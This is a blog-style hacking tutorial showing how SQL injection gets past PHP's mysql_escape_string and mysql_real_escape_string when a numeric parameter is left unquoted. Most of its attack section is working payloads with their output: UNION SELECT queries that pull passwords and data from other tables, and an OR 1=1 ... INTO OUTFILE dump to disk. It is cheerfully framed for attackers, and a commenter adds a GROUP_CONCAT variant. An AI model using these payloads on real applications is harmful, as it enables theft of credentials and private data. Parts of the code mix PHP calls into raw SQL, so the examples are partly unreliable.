Bypassing PHP security (mysql_escape_string) while SQL injection attacks is possible

Bypassing PHP security (mysql_escape_string) while SQL injection attacks is possible

Bypassing PHP security (mysql_escape_string) while SQL injection attacks is possible

Bypassing PHP security (mysql_escape_string) while SQL injection attacks is possible

Hello Again, In previous tutorial we saw how hackers can bypass PHP authentication by using simple tricks. In fact hacking is a game of tricks. The more you play more you’ll gain.

Now lets play with mysql_escape_string . Developers assume that insert mysql_escape_string and keep hackers away. Here is the guide for developers and hackers how this security measure is violated.

First of all take a look on how it is used in program on line number 17 of code included in  this Article.

Now lets check how to bypass this security.

In general string mysql_escape_string (string $unescaped_string). This function will escape the unescaped_string, so that it is safe to place it in a mysql_query().

First of all mysql_escape_string() does not take a connection argument and does not respect the current charset setting it suffers from the same flaw as addslashes and can be exploited in the same manner.

mysql_escape_string() does not escape % and _
One manifestation of an exploit here could be injection on the LIKE clause of a query

According to manual string mysql_real_escape_string (string $unescaped_string [, resource $link_identifier])
Escapes special characters in the unescaped_string, taking into account the current character set of the connection so that it is safe to place it in a mysql_query() This function must always be used (with few exceptions) to make data safe before sending a query to MySQL.string

In reality, mysql_real_escape_string is there to escape strings and prevent SQL injection on string variables.

Again,

In reality, mysql_real_escape_string  is used to escape strings and prevent SQL injection on string variables.

Note the keywords.

Numeric variables are not protected and can be exploited for SQL injection even when passed to mysql_real_escape_string.

i.e.

‘ –> \’

don’t –> don\’t

1 OR 1=1 –> 1 OR 1=1

NOW Actual Exploitation:

Suppose we have this table.

[code]

mysql> SELECT * FROM users;
+—-+————–+———–+—————+
| id | username     | password  | email         |
+—-+————–+———–+—————+
|  1 | acidburn     | 3rdegre3  | ab@itshacked.com |
|  2 | zerocool     | 0kewl     | zc@itshacked.com |
|  3 | lordnikon    | c4mera    | ln@itshacked.com |
|  4 | cerealkiller | fr00tl00p | ck@itshacked.com |
+—-+————–+———–+—————+
4 rows in set (0.00 sec)

[/code]

And this table.

[code]

mysql> SELECT * FROM notes;
+—-+———+————————–+
| id | user_id | content                  |
+—-+———+————————–+
|  1 |       2 | i hate acid burn         |
|  2 |       3 | two words: davinci virus |
|  3 |       1 | i hate crash override    |
|  4 |       4 | am i on bsd or lsd?      |
+—-+———+————————–+
4 rows in set (0.00 sec)

[/code]

And this query with protection.

[code]

SELECT    *
FROM    users
WHERE    id = mysql_real_escape_string($user_id);
[/code]

Exploit and integer variable.

[code]

mysql> SELECT * FROM users WHERE id = 1;
+—-+———-+———-+—————+
| id | username | password | email         |
+—-+———-+———-+—————+
|  1 | acidburn | 3rdegre3 | ab@itshacked.com |
+—-+———-+———-+—————+
1 row in set (0.00 sec)

GOOD

[/code]

Worthless,

[code]

SELECT    *
FROM    users
WHERE    id = mysql_real_escape_string(“1 UNION SELECT id, user_id, content, NULL FROM notes WHERE user_id = 1”);

[/code]

The query returns

[code]

mysql> SELECT * FROM users WHERE id = 1 UNION SELECT id, user_id, content, NULL FROM notes WHERE user_id = 1;
+—-+———-+———————–+—————+
| id | username | password              | email         |
+—-+———-+———————–+—————+
|  1 | acidburn | 3rdegre3              | ab@itshacked.com |
|  3 | 1        | i hate crash override | NULL          |
+—-+———-+———————–+—————+
2 rows in set (0.00 sec)

BAD

[/code]

UNION can help pull more data than what the original query would allow. In the previous example, we retrieved data from a separate table. We can also get more data from the same table.

[code]

mysql> SELECT id, username FROM users WHERE id = 1;
+—-+———-+
| id | username |
+—-+———-+
|  1 | acidburn |
+—-+———-+
1 row in set (0.00 sec)

GOOD

[/code]

And the exploited query would be.

[code]

mysql> SELECT id, username FROM users WHERE id = 1 UNION SELECT password, email FROM users WHERE id = 1;
+———-+—————+
| id       | username      |
+———-+—————+
| 1        | acidburn      |
| 3rdegre3 | ab@itshacked.com |
+———-+—————+
2 rows in set (0.00 sec)

BAD

[/code]

File I/O is important functionality for MySQL, especially for data import and export. SQL injection can help abuse this functionality to provide more surface area to attack.

Consider this situation…
Want: Dump of users and notes.
Given: Application with arbitrary file disclosure and SQL injection (no protection).
Caveat: Application code only operates on first row of resultset (will not return full resultset).

[code]

SELECT    *
FROM    users
WHERE    id = 1 OR 1=1 UNION SELECT id, user_id, content, 0 FROM notes INTO OUTFILE ‘/tmp/users_notes.txt’;

[/code]

WIN it 😉

[code]

$ cat users_notes.txt
1       acidburn        3rdegre3        ab@itshacked.com
2       zerocool        0kewl   zc@itshacked.com
3       lordnikon       c4mera  ln@itshacked.com
4       cerealkiller    fr00tl00p       ck@itshacked.com
1       2       i hate acid burn        0
2       3       two words: davinci virus        0
3       1       i hate crash override   0
4       4       am i on bsd or lsd?     0

[/code]

Oh my god!!! It’s damn easy!!!!!

In next article we will learn Blind SQL injection attacks!! Stay tuned 😉

Please encourage me for writing with your questions and greetings in the form of comments bellow.

Sincerely thanks for reading 🙂

About author

You might also like

Tricks and Tips 0 Comments

How to fix network adapter problems in windows 7

There is an extraordinary feature available in Windows 7. Using this feature, you can become a networking expert, even if you don’t have time or inclination to troubleshoot your Network.

Tricks and Tips 0 Comments

Simple Google search techniques

Are you using Google search for finding appropriate pages as you need ? You might have observed that search results are irrelevant many times. We will check out some good

Server Security 3 Comments

No, #Anonymous can’t DDoS the root DNS servers

#Anonymous hackers have announced “Operation Global Blackout“, promising to cause an Internet-wide blackout by disabling the core DNS servers. DNS is the phonebook of the Internet that translates

  • Great tut

  • Anonymous

    Nice tutorial
    Can you explain it with a website. It will make more clear.

  • Saket Theprince

    It won’t work on websites because these are in quotes

  • freeurmind111

    It’s interesting but instead of using INTO OUTFILE to get more results which not always works it is easier to use GROUP_CONCAT on the columns of the query